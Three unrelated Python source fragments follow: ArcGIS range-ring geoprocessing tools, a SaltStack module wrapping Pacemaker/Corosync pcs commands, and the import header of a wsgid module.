        param_4.direction = 'Input'
        param_4.datatype = u'String'
        param_4.value = u'METERS'
        param_4.filter.list = [u'METERS', u'KILOMETERS', u'MILES', u'NAUTICAL_MILES', u'FEET', u'US_SURVEY_FEET']
        # Number_of_Radials
        param_5 = arcpy.Parameter()
        param_5.name = u'Number_of_Radials'
        param_5.displayName = u'Number of Radials'
        param_5.parameterType = 'Required'
        param_5.direction = 'Input'
        param_5.datatype = u'Long'
        param_5.value = u'8'
        # Output_Ring_Features
        param_6 = arcpy.Parameter()
        param_6.name = u'Output_Ring_Features'
        param_6.displayName = u'Output Ring Features'
        param_6.parameterType = 'Required'
        param_6.direction = 'Output'
        param_6.datatype = u'Feature Class'
        param_6.value = u'%scratchGDB%\\Rings'
        param_6.symbology = os.path.join(os.path.dirname(os.path.dirname(__file__)),
                                         "layers", "RangeRings.lyr")
        # Output_Radial_Features
        param_7 = arcpy.Parameter()
        param_7.name = u'Output_Radial_Features'
        param_7.displayName = u'Output Radial Features'
        param_7.parameterType = 'Required'
        param_7.direction = 'Output'
        param_7.datatype = u'Feature Class'
        param_7.value = u'%scratchGDB%\\Radials'
        param_7.symbology = os.path.join(os.path.dirname(os.path.dirname(__file__)),
                                         "layers", "RangeRadials.lyr")
        # Spatial_Reference
        param_8 = arcpy.Parameter()
        param_8.name = u'Spatial_Reference'
        param_8.displayName = u'Spatial Reference'
        param_8.parameterType = 'Optional'
        param_8.direction = 'Input'
        param_8.datatype = u'Spatial Reference'
        return [param_1, param_2, param_3, param_4, param_5, param_6, param_7, param_8]
    def isLicensed(self):
        """Tool has no extension/license requirements."""
        return True
    def updateParameters(self, parameters):
        """Delegate to a ToolValidator if one is defined on the class
        (this class defines none, so this is a no-op)."""
        validator = getattr(self, 'ToolValidator', None)
        if validator:
            return validator(parameters).updateParameters()
    def updateMessages(self, parameters):
        """Delegate to a ToolValidator if one is defined on the class
        (this class defines none, so this is a no-op)."""
        validator = getattr(self, 'ToolValidator', None)
        if validator:
            return validator(parameters).updateMessages()
    def execute(self, parameters, messages):
        """Build the rings and radials via RangeRingUtils.rangeRingsFromInterval.

        Returns a (ring feature class, radial feature class) pair.
        """
        inputCenterFeatures = parameters[0].valueAsText
        inputNumberOfRings = parameters[1].value
        inputDistanceBetween = parameters[2].value
        inputDistanceUnits = parameters[3].value
        inputNumberOfRadials = parameters[4].value
        outputRingFeatures = parameters[5].valueAsText
        outputRadialFeatures = parameters[6].valueAsText
        optionalSpatialReference = parameters[7].value
        optionalSpatialReferenceAsText = parameters[7].valueAsText
        # "#" / "" means the optional spatial reference was not supplied.
        if optionalSpatialReferenceAsText == "#" or optionalSpatialReferenceAsText == "":
            optionalSpatialReference = None
        # WORKAROUND (for Pro): clear layer selection (since last point is selected)
        # So tool will work on all points entered
        featureSetDescribe = arcpy.Describe(inputCenterFeatures)
        if sys.version_info >= (3, 0) and (featureSetDescribe.dataType == "FeatureLayer"):
            arcpy.SelectLayerByAttribute_management(inputCenterFeatures, "CLEAR_SELECTION")
        # get/set environment
        arcpy.env.overwriteOutput = True
        # Call tool method
        rr = RangeRingUtils.rangeRingsFromInterval(inputCenterFeatures,
                                                   inputNumberOfRings,
                                                   inputDistanceBetween,
                                                   inputDistanceUnits,
                                                   inputNumberOfRadials,
                                                   outputRingFeatures,
                                                   outputRadialFeatures,
                                                   optionalSpatialReference)
        # Set output
        return rr[0], rr[1]
# ----------------------------------------------------------------------------------
# RangeRingFromMinimumAndMaximum Tool
# ----------------------------------------------------------------------------------
class RangeRingFromMinimumAndMaximum(object):
    """Geoprocessing tool: creates a pair of rings (minimum and maximum range)
    around each input center feature, plus optional radial lines."""
    def __init__(self):
        # Tool metadata displayed in the ArcGIS toolbox UI.
        self.label = u'Range Rings From Minimum And Maximum'
        self.description = u'Create a concentric circle from a center with two rings depicting a minimum range and a maximum range.'
        self.category = u'Distance and Direction'
        self.canRunInBackground = False
    def getParameterInfo(self):
        """Declare the tool's eight parameters, in the order execute() reads them."""
        # Input_Center_Features
        param_1 = arcpy.Parameter()
        param_1.name = u'Input_Center_Features'
        param_1.displayName = u'Input Center Features'
        param_1.parameterType = 'Required'
        param_1.direction = 'Input'
        param_1.datatype = u'Feature Set'
        # Set the Feature Set schema from the template layer file
        input_layer_file_path = os.path.join(os.path.dirname(os.path.dirname(__file__)),
                                             "layers",
                                             "RangeRingInputObserversGDB.lyr")
        param_1.value = input_layer_file_path
        # Minimum_Range
        param_2 = arcpy.Parameter()
        param_2.name = u'Minimum_Range'
        param_2.displayName = u'Minimum Range'
        param_2.parameterType = 'Required'
        param_2.direction = 'Input'
        param_2.datatype = u'Double'
        param_2.value = u'10'
        # Maximum_Range
        param_3 = arcpy.Parameter()
        param_3.name = u'Maximum_Range'
        param_3.displayName = u'Maximum Range'
        param_3.parameterType = 'Required'
        param_3.direction = 'Input'
        param_3.datatype = u'Double'
        param_3.value = u'100'
        # Distance_Units
        param_4 = arcpy.Parameter()
        param_4.name = u'Distance_Units'
        param_4.displayName = u'Distance Units'
        param_4.parameterType = 'Required'
        param_4.direction = 'Input'
        param_4.datatype = u'String'
        param_4.value = u'METERS'
        param_4.filter.list = [u'METERS', u'KILOMETERS', u'MILES', u'NAUTICAL_MILES', u'FEET', u'US_SURVEY_FEET']
        # Number_of_Radials
        param_5 = arcpy.Parameter()
        param_5.name = u'Number_of_Radials'
        param_5.displayName = u'Number of Radials'
        param_5.parameterType = 'Required'
        param_5.direction = 'Input'
        param_5.datatype = u'Long'
        param_5.value = u'8'
        # Output_Ring_Features
        param_6 = arcpy.Parameter()
        param_6.name = u'Output_Ring_Features'
        param_6.displayName = u'Output Ring Features'
        param_6.parameterType = 'Required'
        param_6.direction = 'Output'
        param_6.datatype = u'Feature Class'
        param_6.value = u'%scratchGDB%\\rings'
        param_6.symbology = os.path.join(os.path.dirname(os.path.dirname(__file__)),
                                         "layers", "RangeRings.lyr")
        # Output_Radial_Features
        param_7 = arcpy.Parameter()
        param_7.name = u'Output_Radial_Features'
        param_7.displayName = u'Output Radial Features'
        param_7.parameterType = 'Required'
        param_7.direction = 'Output'
        param_7.datatype = u'Feature Class'
        param_7.value = u'%scratchGDB%\\radials'
        param_7.symbology = os.path.join(os.path.dirname(os.path.dirname(__file__)),
                                         "layers", "RangeRadials.lyr")
        # Spatial_Reference
        param_8 = arcpy.Parameter()
        param_8.name = u'Spatial_Reference'
        param_8.displayName = u'Spatial Reference'
        param_8.parameterType = 'Optional'
        param_8.direction = 'Input'
        param_8.datatype = u'Spatial Reference'
        return [param_1, param_2, param_3, param_4, param_5, param_6, param_7, param_8]
    def isLicensed(self):
        """Tool has no extension/license requirements."""
        return True
    def updateParameters(self, parameters):
        """Delegate to a ToolValidator if one is defined on the class
        (this class defines none, so this is a no-op)."""
        validator = getattr(self, 'ToolValidator', None)
        if validator:
            return validator(parameters).updateParameters()
    def updateMessages(self, parameters):
        """Delegate to a ToolValidator if one is defined on the class
        (this class defines none, so this is a no-op)."""
        validator = getattr(self, 'ToolValidator', None)
        if validator:
            return validator(parameters).updateMessages()
    def execute(self, parameters, messages):
        """Build the min/max rings and radials via RangeRingUtils.rangeRingsFromMinMax.

        Returns a (ring feature class, radial feature class) pair.
        """
        inputCenterFeatures = parameters[0].valueAsText
        inputMinimumRange = parameters[1].value
        inputMaximumRange = parameters[2].value
        inputDistanceUnits = parameters[3].value
        inputNumberOfRadials = parameters[4].value
        outputRingFeatures = parameters[5].valueAsText
        outputRadialFeatures = parameters[6].valueAsText
        optionalSpatialReference = parameters[7].value
        optionalSpatialReferenceAsText = parameters[7].valueAsText
        # "#" / "" means the optional spatial reference was not supplied.
        if optionalSpatialReferenceAsText == "#" or optionalSpatialReferenceAsText == "":
            optionalSpatialReference = None
        # WORKAROUND (for Pro): clear layer selection (since last point is selected)
        # So tool will work on all points entered
        featureSetDescribe = arcpy.Describe(inputCenterFeatures)
        if sys.version_info >= (3, 0) and (featureSetDescribe.dataType == "FeatureLayer"):
            arcpy.SelectLayerByAttribute_management(inputCenterFeatures, "CLEAR_SELECTION")
        rr = RangeRingUtils.rangeRingsFromMinMax(inputCenterFeatures,
                                                 inputMinimumRange,
                                                 inputMaximumRange,
                                                 inputDistanceUnits,
                                                 inputNumberOfRadials,
                                                 outputRingFeatures,
                                                 outputRadialFeatures,
                                                 optionalSpatialReference)
        # Set output
        return rr[0], rr[1]
# ----------------------------------------------------------------------------------
# RangeRingsFromMinAndMaxTable Tool
# ----------------------------------------------------------------------------------
class RangeRingsFromMinAndMaxTable(object):
    """Geoprocessing tool: creates min/max range ring pairs around each input
    center feature, with the ranges looked up from a table of named types."""
    class ToolValidator(object):
        """Class for validating a tool's parameter values and controlling
        the behavior of the tool's dialog."""
        def __init__(self, parameters):
            """Setup arcpy and the list of tool parameters."""
            self.params = parameters
        def initializeParameters(self):
            """Refine the properties of a tool's parameters. This method is
            called when the tool is opened."""
            # Input Center Features (Feature Set) [0]
            # Input Table (Table) [1]
            # Selected Type (String) [2]
            # Number of Radials (Long) [3]
            # Output Ring Features (Feature Class) [4]
            # Output Radial Features (Feature Class) [5]
            # Spatial Reference (Spatial Reference) [6]
            # Input Table Type Name Field (Field) [7]
            # Input Table Minimum Range Field (Field) [8]
            # Input Table Maximum Range Field (Field) [9]
            inputParamsTable = os.path.join(os.path.dirname(os.path.dirname(__file__)),
                                            "tooldata", "RangeRings.gdb", "rrInputTable")
            self.params[1].value = inputParamsTable
            # Get list of type names from InputTable [1]
            typeNames = self.updateTypes(str(self.params[1].value))
            self.params[2].filter.list = typeNames
            self.params[2].value = typeNames[0]
            return
        def updateParameters(self):
            """Modify the values and properties of parameters before internal
            validation is performed. This method is called whenever a parameter
            has been changed."""
            if self.params[1].altered:
                # Update list of type names from Input Table [1]
                self.params[2].filter.list = self.updateTypes(str(self.params[1].value))
            return
        def updateMessages(self):
            """Modify the messages created by internal validation for each tool
            parameter. This method is called after internal validation."""
            return
        def updateTypes(self, inputTable):
            """Return the values of the 'Name' field of inputTable as a list.

            On any read failure a one-element list containing an error marker
            is returned so the type drop-down still renders.
            """
            Names = []
            try:
                tableRows = arcpy.da.SearchCursor(inputTable, ["Name"])
                for row in tableRows:
                    name = str(row[0])
                    Names.append(name)
                del tableRows
            except Exception:
                # BUG FIX: the previous version called AddErrorMessage on the
                # undefined name `messages`, raising a NameError inside the
                # handler. Use arcpy.AddError, which is always available here.
                msg = r"ERROR LOADING INPUT TABLE!!"
                Names.append(msg)
                arcpy.AddError(msg)
            return Names
    def __init__(self):
        # Tool metadata displayed in the ArcGIS toolbox UI.
        self.label = u'Range Rings From Minimum And Maximum Table'
        self.description = u'Create a concentric circle from a center with two rings depicting a minimum range and a maximum range from a table.'
        self.category = u'Distance and Direction'
        self.canRunInBackground = False
    def getParameterInfo(self):
        """Declare the tool's ten parameters, in the order execute() reads them."""
        # Input_Center_Features
        param_1 = arcpy.Parameter()
        param_1.name = u'Input_Center_Features'
        param_1.displayName = u'Input Center Features'
        param_1.parameterType = 'Required'
        param_1.direction = 'Input'
        param_1.datatype = u'Feature Set'
        # Set the Feature Set schema from the template layer file
        input_layer_file_path = os.path.join(os.path.dirname(os.path.dirname(__file__)),
                                             "layers",
                                             "RangeRingInputObserversGDB.lyr")
        param_1.value = input_layer_file_path
        # Input_Table
        param_2 = arcpy.Parameter()
        param_2.name = u'Input_Table'
        param_2.displayName = u'Input Table'
        param_2.parameterType = 'Required'
        param_2.direction = 'Input'
        param_2.datatype = u'Table'
        # military-tools-geoprocessing-toolbox\\toolboxes\\tooldata\\Range
        # Rings.gdb\\rrInputTable'
        param_2.value = os.path.join(os.path.dirname(os.path.dirname(__file__)),
                                     "tooldata", "RangeRings.gdb", "rrInputTable")
        # Selected_Type
        param_3 = arcpy.Parameter()
        param_3.name = u'Selected_Type'
        param_3.displayName = u'Selected Type'
        param_3.parameterType = 'Required'
        param_3.direction = 'Input'
        param_3.datatype = u'String'
        param_3.value = u'M4'
        param_3.filter.list = [u'M4', u'M249']
        # Number_Of_Radials
        param_4 = arcpy.Parameter()
        param_4.name = u'Number_Of_Radials'
        param_4.displayName = u'Number Of Radials'
        param_4.parameterType = 'Required'
        param_4.direction = 'Input'
        param_4.datatype = u'Long'
        param_4.value = u'8'
        # Output_Ring_Features
        param_5 = arcpy.Parameter()
        param_5.name = u'Output_Ring_Features'
        param_5.displayName = u'Output Ring Features'
        param_5.parameterType = 'Required'
        param_5.direction = 'Output'
        param_5.datatype = u'Feature Class'
        param_5.value = u'%scratchGDB%\\Rings'
        param_5.symbology = os.path.join(os.path.dirname(os.path.dirname(__file__)),
                                         "layers", "RangeRings.lyr")
        # Output_Radial_Features
        param_6 = arcpy.Parameter()
        param_6.name = u'Output_Radial_Features'
        param_6.displayName = u'Output Radial Features'
        param_6.parameterType = 'Required'
        param_6.direction = 'Output'
        param_6.datatype = u'Feature Class'
        param_6.value = u'%scratchGDB%\\Radials'
        param_6.symbology = os.path.join(os.path.dirname(os.path.dirname(__file__)),
                                         "layers", "RangeRadials.lyr")
        # Spatial_Reference
        param_7 = arcpy.Parameter()
        param_7.name = u'Spatial_Reference'
        param_7.displayName = u'Spatial Reference'
        param_7.parameterType = 'Optional'
        param_7.direction = 'Input'
        param_7.datatype = u'Spatial Reference'
        # Input_Table_Type_Name_Field
        param_8 = arcpy.Parameter()
        param_8.name = u'Input_Table_Type_Name_Field'
        param_8.displayName = u'Input Table Type Name Field'
        param_8.parameterType = 'Optional'
        param_8.direction = 'Input'
        param_8.datatype = u'Field'
        param_8.value = u'Name'
        param_8.parameterDependencies = ["Input_Table"]
        param_8.category = "Input Table Options"
        # Input_Table_Minimum_Range_Field
        param_9 = arcpy.Parameter()
        param_9.name = u'Input_Table_Minimum_Range_Field'
        param_9.displayName = u'Input Table Minimum Range Field'
        param_9.parameterType = 'Optional'
        param_9.direction = 'Input'
        param_9.datatype = u'Field'
        param_9.value = u'Min'
        param_9.parameterDependencies = ["Input_Table"]
        param_9.category = "Input Table Options"
        # Input_Table_Maximum_Range_Field
        param_10 = arcpy.Parameter()
        param_10.name = u'Input_Table_Maximum_Range_Field'
        param_10.displayName = u'Input Table Maximum Range Field'
        param_10.parameterType = 'Optional'
        param_10.direction = 'Input'
        param_10.datatype = u'Field'
        param_10.value = u'Max'
        param_10.parameterDependencies = ["Input_Table"]
        param_10.category = "Input Table Options"
        return [param_1, param_2, param_3, param_4, param_5, param_6, param_7, param_8, param_9, param_10]
    def isLicensed(self):
        """Tool has no extension/license requirements."""
        return True
    def updateParameters(self, parameters):
        """Delegate to the nested ToolValidator defined above."""
        validator = getattr(self, 'ToolValidator', None)
        if validator:
            return validator(parameters).updateParameters()
    def updateMessages(self, parameters):
        """Delegate to the nested ToolValidator defined above."""
        validator = getattr(self, 'ToolValidator', None)
        if validator:
            return validator(parameters).updateMessages()
    def execute(self, parameters, messages):
        """Look up min/max ranges for the selected type in the input table,
        then build the rings via RangeRingUtils.rangeRingsFromMinMax.

        Returns a (ring feature class, radial feature class) pair, or None
        if the selected type cannot be resolved from the table.
        """
        inputCenterFeatures = parameters[0].valueAsText
        inputTable = parameters[1].valueAsText
        inputSelectedType = parameters[2].value
        inputNumberOfRadials = parameters[3].value
        outputRingFeatures = parameters[4].valueAsText
        outputRadialFeatures = parameters[5].valueAsText
        optionalSpatialReference = parameters[6].value
        optionalSpatialReferenceAsText = parameters[6].valueAsText
        # "#" / "" means the optional spatial reference was not supplied.
        if optionalSpatialReferenceAsText == "#" or optionalSpatialReferenceAsText == '':
            optionalSpatialReference = None
        # WORKAROUND (for Pro): clear layer selection (since last point is selected)
        # So tool will work on all points entered
        featureSetDescribe = arcpy.Describe(inputCenterFeatures)
        if sys.version_info >= (3, 0) and (featureSetDescribe.dataType == "FeatureLayer"):
            arcpy.SelectLayerByAttribute_management(inputCenterFeatures, "CLEAR_SELECTION")
        # Weapon Table Options
        # BUG FIX: default the optional field names so the checks below cannot
        # raise UnboundLocalError when fewer parameters are supplied.
        inputTypeNameField = parameters[7].valueAsText if len(parameters) > 7 else None
        inputTypeMinRangeField = parameters[8].valueAsText if len(parameters) > 8 else None
        inputTypeMaxRangeField = parameters[9].valueAsText if len(parameters) > 9 else None
        # BUG FIX: initialize the ranges so a missing table row or missing
        # field names produce a clear tool error instead of UnboundLocalError.
        inputMinimumRange = None
        inputMaximumRange = None
        if inputTypeNameField not in (None, "#", "") and \
           inputTypeMinRangeField not in (None, "#", "") and \
           inputTypeMaxRangeField not in (None, "#", ""):
            # get min and max range for selected weapon
            cursorFields = [inputTypeNameField, inputTypeMinRangeField, inputTypeMaxRangeField]
            with arcpy.da.SearchCursor(inputTable, cursorFields) as cursor:
                for row in cursor:
                    if str(inputSelectedType) == str(row[0]):
                        inputMinimumRange = row[1]
                        inputMaximumRange = row[2]
        if inputMinimumRange is None or inputMaximumRange is None:
            arcpy.AddError("Could not find ranges for selected type: {}".format(inputSelectedType))
            return None
        # get/set environment
        arcpy.env.overwriteOutput = True
        # Call tool method
        rr = RangeRingUtils.rangeRingsFromMinMax(inputCenterFeatures,
                                                 inputMinimumRange,
                                                 inputMaximumRange,
                                                 "METERS",
                                                 inputNumberOfRadials,
                                                 outputRingFeatures,
                                                 outputRadialFeatures,
                                                 optionalSpatialReference)
        # Set output
        return rr[0], rr[1]
| |
"""
Configure a Pacemaker/Corosync cluster with PCS
===============================================
Configure Pacemaker/Corosync clusters with the
Pacemaker/Corosync configuration system (PCS)
:depends: pcs
.. versionadded:: 2016.3.0
"""
import logging
import salt.utils.path
log = logging.getLogger(__name__)
def __virtual__():
    """
    Only load if pcs package is installed
    """
    if not salt.utils.path.which("pcs"):
        return (False, "Missing dependency: pcs")
    return "pcs"
def __use_new_commands():
    """
    The command line arguments of pcs changed after version 0.10

    Returns True when the new-style arguments are needed and False when the
    old ones are needed.
    """
    pcs_version = __salt__["pkg.version"]("pcs")
    log.debug("PCS package version %s", pcs_version)
    # version_cmp returns 1 exactly when pcs_version > 0.10
    if __salt__["pkg.version_cmp"](pcs_version, "0.10") != 1:
        log.debug("Old Version")
        return False
    log.debug("New version, new command")
    return True
def item_show(
    item, item_id=None, item_type=None, show="show", extra_args=None, cibfile=None
):
    """
    Show an item via pcs command
    (mainly for use with the pcs state module)

    item
        config, property, resource, constraint etc.
    item_id
        id of the item
    item_type
        item type
    show
        show command (probably None, default: show or status for newer implementation)
    extra_args
        additional options for the pcs command
    cibfile
        use cibfile instead of the live CIB
    """
    new_commands = __use_new_commands()
    cmd = ["pcs"]
    # Operate on a CIB file instead of the live cluster when requested.
    if isinstance(cibfile, str):
        cmd += ["-f", cibfile]
    if isinstance(item, str):
        cmd += [item]
    elif isinstance(item, (list, tuple)):
        cmd += item
    # constraint command follows a different order
    if item in ["constraint"]:
        cmd += [item_type]
    # New implementions use config instead of show. This resolves that issue.
    if new_commands and (
        item != "config" and item != "constraint" and item != "property"
    ):
        if show == "show":
            show = "config"
        elif isinstance(show, (list, tuple)):
            # BUG FIX: build a new list instead of assigning into the original
            # sequence -- tuples are immutable (the old in-place assignment
            # raised TypeError for them), and mutating the caller's list was
            # an unwanted side effect.
            show = ["config" if entry == "show" else entry for entry in show]
    if isinstance(show, str):
        cmd += [show]
    elif isinstance(show, (list, tuple)):
        cmd += show
    if isinstance(item_id, str):
        cmd += [item_id]
    if isinstance(extra_args, (list, tuple)):
        cmd += extra_args
    # constraint command only shows id, when using '--full'-parameter
    if item in ["constraint"]:
        if not isinstance(extra_args, (list, tuple)) or "--full" not in extra_args:
            cmd += ["--full"]
    log.debug("Running item show %s", cmd)
    return __salt__["cmd.run_all"](cmd, output_loglevel="trace", python_shell=False)
def item_create(
    item, item_id, item_type, create="create", extra_args=None, cibfile=None
):
    """
    Create an item via pcs command
    (mainly for use with the pcs state module)

    item
        config, property, resource, constraint etc.
    item_id
        id of the item
    item_type
        item type
    create
        create command (create or set f.e., default: create)
    extra_args
        additional options for the pcs command
    cibfile
        use cibfile instead of the live CIB
    """
    cmd = ["pcs"]
    # Operate on a CIB file instead of the live cluster when requested.
    if isinstance(cibfile, str):
        cmd += ["-f", cibfile]
    if isinstance(item, str):
        cmd += [item]
    elif isinstance(item, (list, tuple)):
        cmd += item
    # constraint command follows a different order: type comes before the verb
    if item in ["constraint"]:
        if isinstance(item_type, str):
            cmd += [item_type]
    if isinstance(create, str):
        cmd += [create]
    elif isinstance(create, (list, tuple)):
        cmd += create
    # constraint command needs item_id in format 'id=<id>' after all params
    # (handled below); every other item takes id then type positionally
    if item not in ["constraint"]:
        cmd += [item_id]
        if isinstance(item_type, str):
            cmd += [item_type]
    if isinstance(extra_args, (list, tuple)):
        # constraint command needs item_id in format 'id=<id>' after all params
        if item in ["constraint"]:
            extra_args = extra_args + ["id={}".format(item_id)]
        cmd += extra_args
    return __salt__["cmd.run_all"](cmd, output_loglevel="trace", python_shell=False)
def auth(nodes, pcsuser="hacluster", pcspasswd="hacluster", extra_args=None):
    """
    Authorize nodes to the cluster

    nodes
        a list of nodes which should be authorized to the cluster
    pcsuser
        user for communication with PCS (default: hacluster)
    pcspasswd
        password for pcsuser (default: hacluster)
    extra_args
        list of extra options for the \'pcs cluster auth\' command. The newer cluster host command has no extra args and so will ignore it.

    CLI Example:

    .. code-block:: bash

        salt '*' pcs.auth nodes='[ node1.example.org node2.example.org ]' pcsuser=hacluster pcspasswd=hoonetorg extra_args=[ '--force' ]
    """
    # PERF FIX: determine the command dialect once; the previous version
    # called __use_new_commands() twice, querying the package manager twice.
    new_commands = __use_new_commands()
    if new_commands:
        cmd = ["pcs", "host", "auth"]
    else:
        cmd = ["pcs", "cluster", "auth"]
    cmd.extend(["-u", pcsuser, "-p", pcspasswd])
    # The newer 'pcs host auth' takes no extra arguments, so they are ignored.
    if not new_commands and isinstance(extra_args, (list, tuple)):
        cmd += extra_args
    cmd += nodes
    return __salt__["cmd.run_all"](cmd, output_loglevel="trace", python_shell=False)
def is_auth(nodes, pcsuser="hacluster", pcspasswd="hacluster"):
    """
    Check if nodes are already authorized

    nodes
        a list of nodes to be checked for authorization to the cluster
    pcsuser
        user for communication with PCS (default: hacluster)
    pcspasswd
        password for pcsuser (default: hacluster)

    CLI Example:

    .. code-block:: bash

        salt '*' pcs.is_auth nodes='[node1.example.org node2.example.org]' pcsuser=hacluster pcspasswd=hoonetorg
    """
    if __use_new_commands():
        cmd = ["pcs", "host", "auth", "-u", pcsuser, "-p", pcspasswd]
    else:
        cmd = ["pcs", "cluster", "auth"]
    cmd.extend(nodes)
    # Feed empty lines on stdin so any interactive prompt falls through.
    return __salt__["cmd.run_all"](
        cmd, stdin="\n\n", output_loglevel="trace", python_shell=False
    )
def cluster_setup(nodes, pcsclustername="pcscluster", extra_args=None):
    """
    Setup pacemaker cluster via pcs command

    nodes
        a list of nodes which should be set up
    pcsclustername
        Name of the Pacemaker cluster (default: pcscluster)
    extra_args
        list of extra options for the \'pcs cluster setup\' command

    CLI Example:

    .. code-block:: bash

        salt '*' pcs.cluster_setup nodes='[ node1.example.org node2.example.org ]' pcsclustername=pcscluster
    """
    cmd = ["pcs", "cluster", "setup"]
    # Newer pcs takes the cluster name positionally; older pcs uses --name.
    if __use_new_commands():
        cmd.append(pcsclustername)
    else:
        cmd.extend(["--name", pcsclustername])
    cmd.extend(nodes)
    if isinstance(extra_args, (list, tuple)):
        cmd.extend(extra_args)
    log.debug("Running cluster setup: %s", cmd)
    return __salt__["cmd.run_all"](cmd, output_loglevel="trace", python_shell=False)
def cluster_destroy(extra_args=None):
    """
    Destroy corosync cluster using the pcs command

    extra_args
        list of extra options for the \'pcs cluster destroy\' command (only really --all)

    CLI Example:

    .. code-block:: bash

        salt '*' pcs.cluster_destroy extra_args=--all
    """
    cmd = ["pcs", "cluster", "destroy"]
    if isinstance(extra_args, (list, tuple)):
        cmd.extend(extra_args)
    log.debug("Running cluster destroy: %s", cmd)
    return __salt__["cmd.run_all"](cmd, output_loglevel="trace", python_shell=False)
def cluster_node_add(node, extra_args=None):
    """
    Add a node to the pacemaker cluster via pcs command

    node
        node that should be added
    extra_args
        list of extra options for the \'pcs cluster node add\' command

    CLI Example:

    .. code-block:: bash

        salt '*' pcs.cluster_node_add node=node2.example.org
    """
    cmd = ["pcs", "cluster", "node", "add", node]
    if isinstance(extra_args, (list, tuple)):
        cmd.extend(extra_args)
    return __salt__["cmd.run_all"](cmd, output_loglevel="trace", python_shell=False)
def cib_create(cibfile, scope="configuration", extra_args=None):
    """
    Create a CIB-file from the current CIB of the cluster

    cibfile
        name/path of the file containing the CIB
    scope
        specific section of the CIB (default: configuration)
    extra_args
        additional options for creating the CIB-file

    CLI Example:

    .. code-block:: bash

        salt '*' pcs.cib_create cibfile='/tmp/VIP_apache_1.cib' scope=False
    """
    cmd = ["pcs", "cluster", "cib", cibfile]
    # Pass scope=False (or any non-string) to dump the whole CIB.
    if isinstance(scope, str):
        cmd.append("scope=" + scope)
    if isinstance(extra_args, (list, tuple)):
        cmd.extend(extra_args)
    return __salt__["cmd.run_all"](cmd, output_loglevel="trace", python_shell=False)
def cib_push(cibfile, scope="configuration", extra_args=None):
    """
    Push a CIB-file as the new CIB to the cluster

    cibfile
        name/path of the file containing the CIB
    scope
        specific section of the CIB (default: configuration)
    extra_args
        additional options for pushing the CIB-file

    CLI Example:

    .. code-block:: bash

        salt '*' pcs.cib_push cibfile='/tmp/VIP_apache_1.cib' scope=False
    """
    cmd = ["pcs", "cluster", "cib-push", cibfile]
    # Pass scope=False (or any non-string) to push the whole CIB.
    if isinstance(scope, str):
        cmd.append("scope=" + scope)
    if isinstance(extra_args, (list, tuple)):
        cmd.extend(extra_args)
    return __salt__["cmd.run_all"](cmd, output_loglevel="trace", python_shell=False)
def config_show(cibfile=None):
    """
    Show config of cluster

    cibfile
        name/path of the file containing the CIB

    CLI Example:

    .. code-block:: bash

        salt '*' pcs.config_show cibfile='/tmp/cib_for_galera'
    """
    # Thin wrapper: item_show defaults item_id and extra_args to None.
    return item_show(item="config", cibfile=cibfile)
def prop_show(prop, extra_args=None, cibfile=None):
    """
    Show the value of a cluster property

    prop
        name of the property
    extra_args
        additional options for the pcs property command
    cibfile
        use cibfile instead of the live CIB

    CLI Example:

    .. code-block:: bash

        salt '*' pcs.prop_show prop='no-quorum-policy' cibfile='/tmp/2_node_cluster.cib'
    """
    return item_show("property", prop, extra_args=extra_args, cibfile=cibfile)
def prop_set(prop, value, extra_args=None, cibfile=None):
    """
    Set the value of a cluster property

    prop
        name of the property
    value
        value of the property prop
    extra_args
        additional options for the pcs property command
    cibfile
        use cibfile instead of the live CIB

    CLI Example:

    .. code-block:: bash

        salt '*' pcs.prop_set prop='no-quorum-policy' value='ignore' cibfile='/tmp/2_node_cluster.cib'
    """
    # pcs expects the property assignment as a single 'name=value' token.
    assignment = "{}={}".format(prop, value)
    return item_create(
        "property",
        assignment,
        None,
        create="set",
        extra_args=extra_args,
        cibfile=cibfile,
    )
def stonith_show(stonith_id, extra_args=None, cibfile=None):
    """
    Show the value of a cluster stonith resource

    stonith_id
        name for the stonith resource
    extra_args
        additional options for the pcs stonith command
    cibfile
        use cibfile instead of the live CIB

    CLI Example:

    .. code-block:: bash

        salt '*' pcs.stonith_show stonith_id='eps_fence' cibfile='/tmp/2_node_cluster.cib'
    """
    return item_show("stonith", stonith_id, extra_args=extra_args, cibfile=cibfile)
def stonith_create(
    stonith_id, stonith_device_type, stonith_device_options=None, cibfile=None
):
    """
    Create a stonith resource via pcs command

    stonith_id
        name for the stonith resource
    stonith_device_type
        name of the stonith agent fence_eps, fence_xvm f.e.
    stonith_device_options
        additional options for creating the stonith resource
    cibfile
        use cibfile instead of the live CIB for manipulation

    CLI Example:

    .. code-block:: bash

        salt '*' pcs.stonith_create stonith_id='eps_fence' stonith_device_type='fence_eps'
        stonith_device_options="['pcmk_host_map=node1.example.org:01;node2.example.org:02', 'ipaddr=myepsdevice.example.org', 'action=reboot', 'power_wait=5', 'verbose=1', 'debug=/var/log/pcsd/eps_fence.log', 'login=hidden', 'passwd=hoonetorg']" cibfile='/tmp/cib_for_stonith.cib'
    """
    return item_create(
        "stonith",
        stonith_id,
        stonith_device_type,
        extra_args=stonith_device_options,
        cibfile=cibfile,
    )
def resource_show(resource_id, extra_args=None, cibfile=None):
    """
    Show a resource via pcs command

    resource_id
        name of the resource

    extra_args
        additional options for the pcs command

    cibfile
        use cibfile instead of the live CIB

    CLI Example:

    .. code-block:: bash

        salt '*' pcs.resource_show resource_id='galera' cibfile='/tmp/cib_for_galera.cib'
    """
    show_kwargs = {
        "item": "resource",
        "item_id": resource_id,
        "extra_args": extra_args,
        "cibfile": cibfile,
    }
    return item_show(**show_kwargs)
def resource_create(resource_id, resource_type, resource_options=None, cibfile=None):
    """
    Create a resource via pcs command

    resource_id
        name for the resource

    resource_type
        resource type (f.e. ocf:heartbeat:IPaddr2 or VirtualIP)

    resource_options
        additional options for creating the resource

    cibfile
        use cibfile instead of the live CIB for manipulation

    CLI Example:

    .. code-block:: bash

        salt '*' pcs.resource_create resource_id='galera' resource_type='ocf:heartbeat:galera' resource_options="['wsrep_cluster_address=gcomm://node1.example.org,node2.example.org,node3.example.org', '--master']" cibfile='/tmp/cib_for_galera.cib'
    """
    create_kwargs = {
        "item": "resource",
        "item_id": resource_id,
        "item_type": resource_type,
        "extra_args": resource_options,
        "cibfile": cibfile,
    }
    return item_create(**create_kwargs)
| |
#encoding: utf-8
__all__ = ['StartResponse', 'StartResponseCalledTwice', 'Plugin', 'run_command', 'validate_input_params', 'Wsgid']
import sys
import logging
import plugnplay
from command import ICommand
import parser
import re
import os
from wsgid import __version__
from wsgid import conf
from wsgid.interfaces.filters import IPreRequestFilter, IPostRequestFilter
from cStringIO import StringIO
import urllib
from message import Message
import zmq
